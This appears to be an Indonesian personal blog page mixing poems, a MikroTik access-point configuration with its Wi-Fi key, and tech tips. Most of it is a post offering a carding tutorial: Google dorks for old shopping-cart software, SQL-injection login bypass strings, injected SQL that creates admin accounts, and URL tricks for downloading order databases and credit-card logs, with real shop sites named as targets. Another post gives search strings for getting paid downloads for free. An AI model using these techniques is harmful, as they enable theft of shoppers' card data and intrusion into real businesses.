Welcome To Helmstandart

Bukan cuma hati loe yang perlu perlindungan tetapi kepala loe juga mesti dilindungi

Tip untuk mengamankan Server anda

Posted in linux with tags on November 23, 2011 by helmstandart

Untuk mengamankan server anda, maka anda harus mengetahui untuk tujuan apa server tersebut digunakan, sehingga anda dapat menggambil langkah-langkah yang harus dilakukan dan menentukan daemon apa saja yang harus diaktifkan, hal-hal yang tidak boleh dilakukan dari workstation.

Akhirnya selamat membaca dan bekerja lebih baik.

Pada bagian  saya akan memberikan 4 buah contoh yang harus anda lakukan pada sistem anda:

- shell provider
- Mail server
- Web server
- Standalone box
Read more »

Tip Trik Gratisan Ambil File Di web

Posted in otak atik kompiku on September 27, 2009 by helmstandart

google sebuah fenomena di dunia internet apapun bisa kita lakukan, kalau saya sih dari dulu buat cari sesuatu di dunia internet gak pernah bayar tinggal pandai pandai kita untuk mencari diantaranya adalah hal ini yang bisa dipakai untuk mencari sesuatu :

1. Buat Download :

- “Here is your download link” +{yg anda cari}   Contoh : “Here is your download link” +ebook
- “Thank you for buying” +{yg anda cari}
- “Thank you for ordering” +{yg anda cari}
- “Thank you for purchasing” +{yg anda cari}
- “Thank you for subscribing” +{yg anda cari}
- “Thank you for your order” +{yg anda cari}
- “Thank you for your payment” +{yg anda cari}
- “Thank you for your purchase” +{yg anda cari}

Read more »

Cinta…

Posted in Cinta on August 6, 2009 by helmstandart

c-erita mengalir begitu saja
i-barat air mengalir tanpa ada tekanan
n-antian muara berujung ke indahan
t-atkala berkumpulnya kisah yang dinanti utk bersatu
a-ir mataku pun membeku dan senyuman mentari menyinari
k-u harapkan ini berujung indah tanpa henti
u-ntuk mengakhiri cying_ontheparty yang slalu ku rasakan

9 February

Posted in Kehidupan on February 9, 2009 by helmstandart

Yakin dengan apa yang telah berlalu
Usia yang bertambah mejadikan aku tua
Layaknya seolah maut yang menunggu
Intaian mata yang siap menerkamku
Alunan suara sendu mengiringi langkah
Namun hati tetap tenang hadapi semua
Ini yang namanya dinanti ajal

Dari relung hati yang paling dalam
Wanita idaman merangkulku
Ikut memberikan kesejukan direlung hati

Kebahagian pun bertambah
Alunan sorak ulang tahun berkumandang
Darimu “sobat”
Aku sungguh bahagia 9 februari ini
Riang gembira menyambar hatiku
Ini tak luput dari rasa sayangmu padaku
Namun aku cuma bisa berkata “terima kasih”
Ini akan aku ingat bersama 1/4 abad usiaku

Pak Tua

Posted in Kehidupan on November 23, 2008 by helmstandart

SEBUAH RENUNGAN…

INDONESIA doesnt need the world, but the world need INDONESIA

Suatu pagi di Bandar Lampung, menjemput seseorang di
bandara. Orang itu sudah tua, kisaran 60 tahun. Sebut saja
Pak tua.

Pak Tua adalah pengusaha asal singapura, dengan logat
bicara gaya melayu, english, (atau singlish?) beliau
menceritakan pengalaman2 hidupnya kepada kami yang masih
muda. Mulai dari pengalaman bisnis, spiritual, keluarga,
bahkan percintaan hehehe..

Read more »

Ngonfig Microtik

Posted in Microtik with tags on October 13, 2008 by helmstandart

 

Untuk Mengkonfik mikrotik dapat menggunakan winbox , click winbox anda kemudian masukan user id admin dan password tekan enter bila masih default, lalu pilih mac address yang anda akan config.

Config buat Acces Point

Interface

- eth1

- wlan

- bridge1

 

wlan setting

Radio-name = radityo

mode = AP-Bridge

ssid = abahku

band = 5GHz

freq = 5180

 

Security Profile = m0m0tu4

 

Default Autentication = yes

Default Forward = yes

 

WDS Setting

wds mode = dynamic

wds de bridge = bridge1

 

Security Profile Setting

name = m0m0tu4

mode = dynamic key

WPA - PSK = yes

WPA2 - PSK = yes

 

WPA - Pre-Share-Key = 4b4h-m0m0-c4y4n9

WPA2- Pre-Share-Key = 4b4h-m0m0-c4y4n9

 

Bridging Setting

interface yang di bridge

- Eth1

- wlan

- wds

 

Setting IP Address

interface yang di setting ip adalah

bridge = 172.30.30.5

 

Config buat CLIENT

Interface

- eth1

- wlan

- bridge

 

wlan setting

radio-name = ademaby

mode = station wds

ssid = abahku

band = 5GHz

freq = 5180

 

Security Profile = m0m0tu4

 

Default Autentication = yes

Default Forward = yes

 

WDS Setting

wds mode = dynamic

wds de bridge = bridge1

 

Security Profile Setting

name = m0m0tu4

mode = dynamic key

WPA - PSK = yes

WPA2 - PSK = yes

 

WPA - Pre-Share-Key = 4b4h-m0m0-c4y4n9

WPA2- Pre-Share-Key = 4b4h-m0m0-c4y4n9

 

Bridging Setting

- Eth1

- wlan

 

Setting IP Address

interface yang di setting ip adalah

bridge = 172.30.30.6

 

:devil: :marah:

Manfaatin Flashdisk Yang Rusak

Posted in otak atik kompiku on September 22, 2008 by helmstandart

awalnya seh gr2 flashdisk mati, kya’y gra2 virus or jarang nge-unplug or unmount tuh flashdisk, e..jd mati beneran…di windows nge-plug tp gak bisa diformat n gak bisa di pake..akhirnya..karena emg aku orang miskin yg ga bsa bli flashdisk aku cari akal gmana caranya supaya flashdisk kesayanganku itu hidup kembali…**bangkit lagi**

Read more »

Apakah saya menikah dengan orang yang tepat..?

Posted in Cinta on September 19, 2008 by helmstandart

Dalam sebuah seminar rumah tangga, seseorang audience tiba-tiba  melontarkan pertanyaan yang sangat lumrah, “bagaimana saya tahu kalo saya menikah dengan orang yang tepat?”

Saya melihat ada seorang lelaki bertubuh besar duduk di sebelahnya, jadi saya menjawab “Ya.. tergantung. Apakah pria disebelah anda itu suami anda?”

Dengan sangat serius dia balik bertanya “Bagaimana anda tahu?!”

“Biarkan saya jawab pertanyaan yang sangat membebani ini.”

Inilah jawabannya!
SETIAP ikatan memiliki siklus.
Pada saat-saat awal sebuah hubungan, anda merasakan jatuh cinta dengan pasangan anda.

Telpon darinya selalu ditunggu-tunggu, begitu merindukan belaian sayangnya, dan begitu menyukai perubahan sikap-sikapnya yang bersemangat, begitu menyenangkan.

Read more »

Mitos Open source

Posted in otak atik kompiku on September 18, 2008 by helmstandart

Banyak pendapat atau pemikiran yang tidak benar tentang Linux dan software bebas/open source lainnya. Berikut ini 6 di antaranya. Mohon koreksi jika saya salah.

1. Free/Open Source berarti Gratis dan Tidak ada Bisnis

Free dalam istilah Free Software berarti freedom (bebas atau merdeka). Yang pasti gratis (no fee) dalam dunia Open Source adalah lisensinya. Artinya, tidak perlu biaya lisensi untuk mendapatkan produk Free/Open Source Software (FOSS). Seandainya MS Windows dan MS Office gratis, tetap tidak disebut free/open source software kalau tidak bebas digunakan, dipelajari, dikembangkan ulang, dan disebarluaskan.

Read more »

Ehm…

Posted in otak atik kompiku on September 18, 2008 by helmstandart

Contoh bugs pada bentuk toko system : shopadmin

Ketik keyword google : allinurl:/shopadmin.asp
Contoh target : www.Target.com/shopadmin.asp
user : ‘or’1
pass : ‘or’1

Contoh bugs pada bentuk toko sistem : Index CGI

Ketik keyword google : allinurl:/store/index.cgi/page=
Contoh target : http://www.Target.com/cgi-bin/store/…short_blue.htm
Hapus short_blue.htm dan ganti dengan :./admin/files/order.log
Hasilnya:http://www.Target.com/cgi-bin/store/…iles/order.log

Contoh bugs pada bentuk toko sistem : metacart

Ketik keyword google.com : allinurl:/metacart/
Contoh target : www.Target.com/metacart/about.asp
Hapus moreinfo.asp dan ganti dengan : –> /database/metacart.mdb
Hasilnya : /www.Target.com/metacart/database/metacart.mdb

Contoh bugs pada bentuk toko sistem CShop

Ketik keyword google.com : allinurl:/DCShop/
Contoh : www.Target.com/xxxx/DCShop/xxxx
Hapus /DCShop/xxxx dan ganti dengan
/DCShop/orders/orders.txt atau /DCShop/Orders/orders.txt
Hasilnya : www.Target.com/xxxx/DCShop/orders/orders.txt

Contoh bugs pada bentuk toko sistem : EShop

Ketik keyword google.com : allinurl:/eshop/
Contoh : www.Target.com/xxxxx/eshop
Hapus /eshop dan ganti dengan : /cg-bin/eshop/database/order.mdb
Hasilnya : http://www.Target.com/…/cg-bin/esh…base/order.mdb
Download file *.mdb nya dan Buka file tsb pakai Microsoft Acces (karena untuk membaca database access.mdb sebaiknya pake ms access aja)

Contoh bugs pada bentuk toko sistem : PDshopro

Ketik keyword google.com : allinurl:/shop/category.asp/catid=
Contoh : www.Target.com/shop/category.asp/catid=xxxxxx
Hapus /shop/category.asp/catid=xxxxxx dang ganti dengan : /admin/dbsetup.asp
Hasilnya : www.Target.com/admin/dbsetup.asp
Dari keterangan diatas , kita dapati file databasenya dgn nama sdatapdshoppro.mdb
Download file sdatapdshoppro.mdb dengan merubah url nya menjadi
www.Target.com/data/pdshoppro.mdb
Buka file tsb pakai Microsoft Acces (karena untuk membaca database access.mdb sebaiknya pake ms access aja)

Contoh bugs pada bentuk toko sistem : commerceSQL

Ketik keyword google.com : allinurl:/commercesql/
Contoh : www.Target.com/commercesql/xxxxx
Hapus commercesql/xxxxx dan ganti dengan: cgi-bin/commercesql/index.cgi?page=
Hasilnya : http://www.Target.com/cgi-bin/commer…ndex.cgi?page=
Untuk melihat admin config
http://www.Target.com/cgi-bin/commer…/admin_conf.pl
Untuk melihat admin manager
http://www.Target.com/cgi-bin/commer…in/manager.cgi
Untuk melihat file log/CCnya
http://www.Target.com/cgi-bin/commer…iles/order.log

Contoh bugs pada bentuk toko sistem : Cart32 v3.5a

Ketik keyword google.com : allinurl:/cart32.exe/
Contoh : http://www.Target.net/wrburns_s/cgi-…xe/NoItemFound
Ganti NoItemFound dengan : error
Bila kita mendapati page error dg keterangan instalasi dibawahnya, berarti kita sukses!
Sekarang, kita menuju pada keterangan di bawahnya, geser halaman kebawah, dan cari bagian Page Setup and Directory Kalau dibagian tersebut terdapat list file dgn format
/akhiran.c32 berarti di site tsb. terdapat file berisi data cc
Copy salah satu file .c32 yg ada atau semuanya ke notepad atau program text editor lainnya.
Ganti string url tsb. menjadi seperti ini : http://www. Target.net/wrburns_s/cgi-bin/cart32/
Nah.., paste satu per satu, file .c32 ke akhir url yg sudah dimodifikasi tadi, dengan format
http://www.Target.com/cart32/
Contoh http://www.Target.net/wrburns_s/cgi-…RNS-001065.c32

Contoh bugs pada bentuk toko sistem : VP-ASP Shopping Cart 5.0

Ketik keyword google.com : allinurl:/vpasp/shopdisplayproducts.asp
Buka url target dan tambahkan string berikut di akhir bagian shopdisplayproducts.asp

Contoh :
http://Target.com/vpasp/shopdisplayp…39;a%25′–

Gantilah nilai dari string url terakhir dg:
: %20′a%25′–
: %20′b%25′–
: %20′c%25′–
Kalau berhasil, kita akan mendapatkan informasi username dan password admin
Untuk login admin ke http://Target.com/vpasp/shopadmin.asp
silahkan Cari sendiri data CCnya

Contoh bugs pada bentuk toko sistem : VP-ASP Shopping Cart 5.0

Ketik keyword google.com : Ketik –> allinurl:/vpasp/shopsearch.asp

Buka url target dan utk membuat admin baru, postingkan data berikut satu per satu pada bagian search engine :

Keyword=&category=5); insert into tbluser (fldusername) values
(”)–&SubCategory=&hide=&action.x=46&action.y=6

Keyword=&category=5); update tbluser set fldpassword=” where
fldusername=”–&SubCategory=All&action.x=33&action.y=6

Keyword=&category=3); update tbluser set fldaccess=’1′ where
fldusername=”–&SubCategory=All&action.x=33&action.y=6

Jangan lupa untuk mengganti dan nya terserah kamu.
Untuk mengganti password admin, masukkan keyword berikut :

Keyword=&category=5); update tbluser set fldpassword=” where
fldusername=’admin’–&SubCategory=All&action.x=33&action.y=6

Untuk login admin, ada di http://Target/vpasp/shopadmin.asp

Contoh bugs pada bentuk toko sistem : Lobby.asp

Ketik keyword google.com : allinurl: Lobby.asp
Contoh : www.Target.com/mall/lobby.asp
Hapus tulisan mall/lobby.asp dan ganti dengan : fpdb/shop.mdb
Hasilnya : www.Target.com/fpdb/shop.mdb

Contoh bugs pada bentuk toko sistem : Shopper.cgi

Ketik keyword google.com : allinurl: /cgi-local/shopper.cgi
Contoh : http://www.Target.com/cgi-local/shop…dd=action&key=
Tambah dengan :…&template=order.log
Hasilnya :
http://www.xxxxxxxx.com/cgi-local/sh…late=order.log

Contoh bugs pada bentuk toko sistem :Proddetail.asp

Ketik keyword google.com : allinurlroddetail.asp?prod=
Contoh : http://www.Target.org/proddetail.asp…ACSASledRaffle
Hapus tulisan proddtail.asp?prod=SG369
dan ganti dengan –> fpdb/vsproducts.mdb
Hasilnya : www.Target.org/fpdb/vsproducts.mdb

Contoh bugs pada bentuk toko sistem igishop

Ketik keyword google.com : inurl:”/cart.php?m=”
Contoh : http://Target.com/store/cart.php?m=view.
Hapus tulisan cart.php?m=view
dan ganti dengan –>admin
Hasilnya http://Target.com/store/admin

Trus masukin username sama pass nya pake statment SQL injection

Usename : ‘or”=”
Password : ‘or”=”

setelah bisa login, cari data yang diperlukan .

Contoh bugs pada bentuk toko sistem : Index CGI

Ketik keyword google.com : allinurl:store/index.cgi/page=
Bugs : ../admin/files/order.log
Example : http://www.target.com/cgi-bin/store/…ir_Manuals.htm
masukin bugsnya : http://www.target.com/cgi-bin/store/…iles/order.log
trus copy-paste tuch log’nya di notepad biar gampang di baca

Contoh bugs pada bentuk toko sistem : Index Cart

Ketik keyword google.com : inurl:”/cart.php?m=”
Bugs : Admin
ganti tulisn cart.php?m=view dengan admin
login pake SQl Injection :
username :’or”=”
Passwordnya :’or”=”
contoh target buat kalian :
https://www.therustybucket.biz/store/admin

Contoh bugs pada bentuk toko sistem : Index cart

Ketik keyword google.com : /ashopKart20/”
bugs : ganti tulisan yang ada didepannya ama admin/scart.mdb
example www.garrysun.com/ashopkart20/addprod.asp
Injection : selanjutnya masukin bugs di atas jadi : www.garrysun.com/ashopkart20/admin/scart.mdb
kalo berhasil loe dapet file beresktension .mdb nach file itu
tmn2 open with MS-Acces

Contoh bugs pada bentuk toko sistem : Catid

Ketik keyword google.com : /shop/category.asp/catid=
Bugs : hapus tulisan /shop/category.asp?catid=2 ganti dengan /admin/dbsetup.asp
example : www.littlesport.net/shop/category.asp?catid=2
masukin bugs menjadi : www.littlesport.net//admin/dbsetup.asp
kalo berhasil dapet file.mdb trus buka pake MS - Access tapi kalo gagal berarti
dah keduluan ma carder yang lain… cari target lain ok..??

Contoh bugs pada bentuk toko sistem : Store

Ketik keyword google.com : inurl:”/store/proddetail.asp?prod=”
bugs : ganti tulisan proddetail.asp?prod= dengan fpdb/vsproducts.mdb
Example : http://www.successlink.org/store/pro…prod=SL-IP0001
masukin bugsnya www.successlink.org/store/fpdb/vsproducts.mdb
download file .mdbnya trus buka pake MS- ACCESS..

Contoh bugs pada bentuk toko sistem : Sunshop

Ketik keyword google.com : “Powered by SunShop 3.2″
Atau google dork : inurl:”/sunshop/index.php?action=”
Bugs : ganti kata index.php dgn admin
kl ada peringatan java script error klik “OK” aja
Contoh buat kalian : http://www.dohertysgym.com/sunshop/index.php
ganti dengan admin http ://www.dohertysgym.com/sunshop/admin
Login pake SQL Injection :
Username : admin
Password :’or”=’

Contoh bugs pada bentuk toko sistem : digishop

Ketik keyword google.com
Ketik keyword google.com : “Powered by Digishop 3.2″
Bugs : hapus tulisan cart.php?m= dengan admin
Login pake SQL Injection :
Username : ‘or”=”
Password : ‘or”=”
Contoh target :
http://uniquescrapbooks.com.au/store/admin
http://www.7footserb.com/shop/admin
https://www.tangerineclothing.com/admin

Contoh bugs pada bentuk toko sistem :Lobby

Ketik keyword google.com : inurl:”mall/lobby.asp”
bugs : ganti tulisan /mall/lobby.asp dengan fpdb/shop.mdb
example : Gem Depot Lobby Page - Search our Inventory
jadi http://www.gemdepot.com/fpdb/shop.mdb
dapat dech .mdb ===> trus klik open database JANGAN klik “convert databese” ===> klk view orders ====> trus cari orang yg pernah belanja contoh pada customer no 36 trus dimana no CCnya badKiddes….
sabar bro… masih di table customer no 36 then klik payment
*yang ini udah di patch jadi udah ngga bisa lg silakan cari lagi korban lainnya